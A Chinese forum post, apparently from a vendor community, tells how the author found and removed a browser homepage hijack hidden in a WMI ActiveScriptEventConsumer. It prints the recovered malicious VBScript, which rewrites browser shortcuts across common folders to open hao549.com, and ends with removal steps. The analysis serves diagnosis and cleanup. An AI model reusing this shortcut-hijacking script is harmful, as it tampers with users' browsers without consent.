解决一个浏览器主页恶意劫持问题
  

sailyang 2478

{{ttag.title}}
    今天公司财务突然问我一个浏览器主页被修改的问题,由于是私人主机非公司电脑,找了网管看过了还是没解决。于是把电脑报过来给我看看了,经查看电脑里除了IE还安装了两个浏览器 UC和360浏览器 快捷方式都被添加了hao549的指向。 因为是UC浏览器主动弹出主页被恶意修改的提示窗 这个问题才被重视起来。

    电脑里面同时安装有360安全卫士和金山毒霸,当时电脑里这两款软件都正常运行且升级到最新版本 结果是完全无用……

    经过网络资料搜索分析原因是通过WMI定时发起的脚本给所有浏览器添加了域名指向

     按搜索下载了Process Monitor工具追踪了浏览器图标 结果发现确实是有脚本打开了scrcons.exe ,终于在root\CIMV2里面揪出了真凶。缘来是在Consumer in root\CIMV2 -> _EventConsumer -> ActiveScriptEventConsumer下,找到ActiveScriptEventConsumer.Name=”VBScriptKids_consumer”

最后是在ScriptText中找到如下代码:
On Error Resume Next
Const link = "http://hao549.com/?r=v&m=4"
Const link360 = "http://hao549.com/?r=v&m=4&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tiand\Desktop,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tiand\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tiand\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr
  oDic.Add LCase(browser), browser
Next
  lnkpathsArr = split(lnkpaths,",")

  Set oFolders = CreateObject("scripting.dictionary")
  For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
  Next
    Set fso = CreateObject("Scripting.Filesystemobject")
    Set WshShell = CreateObject("Wscript.Shell")
    For Each oFolder In oFolders
      If fso.FolderExists(oFolder) Then
        For Each file In fso.GetFolder(oFolder).Files
          If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
              If LCase(name) = LCase("360se.exe") Then
                oShellLink.Arguments = link360
              Else
                oShellLink.Arguments = link
              End If
              If file.Attributes And 1 Then
                file.Attributes = file.Attributes - 1
              End If
              oShellLink.Save

找到了 然后以管理员身份运行WMITool程序(wbemeventviewer.exe)进入root\CIMV2 删除恶意脚本最后把几个浏览器的快捷方式跳转链接删除 问题解决!

打赏鼓励作者,期待更多好文!

打赏
3人已打赏

adds 发表于 2019-8-6 09:12
  
好厉害。。。
Sangfor_闪电回_朱丽 发表于 2019-8-6 14:45
  
平时做好安全防护很重要~
好在最后问题解决,楼主也是很厉害哇,点赞!
好心情能长寿 发表于 2019-8-14 21:58
  
修改代码?
发表新帖
热门标签
全部标签>
每日一问
高手请过招
新版本体验
【 社区to talk】
纪元平台
功能体验
标准化排查
产品连连看
平台使用
GIF动图学习
社区新周刊
安全效果
信服课堂视频
S豆商城资讯
安装部署配置
每周精选
产品解析
专家问答
技术笔记
设备维护
存储
2023技术争霸赛专题
华北区交付直播
畅聊IT
答题自测
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
每日一记
运维工具
用户认证
原创分享
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
SDP百科
功能咨询
终端接入
授权
资源访问
地址转换
虚拟机
迁移
排障笔记本
产品预警公告
玩转零信任
技术争霸赛
「智能机器人」
追光者计划
卧龙计划
华北区拉练
天逸直播
以战代练
秒懂零信任
技术晨报
技术盲盒
山东区技术晨报
文档捉虫
齐鲁TV
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
排障那些事
西北区每日一问
升级&主动服务
高频问题集锦
POC测试案例
全能先锋系列
云化安全能力
专家说
热门活动
产品动态
行业实践
关键解决方案

本版版主

461
248
13

发帖

粉丝

关注

本版达人

feeling

本周分享达人

新手29676...

本周提问达人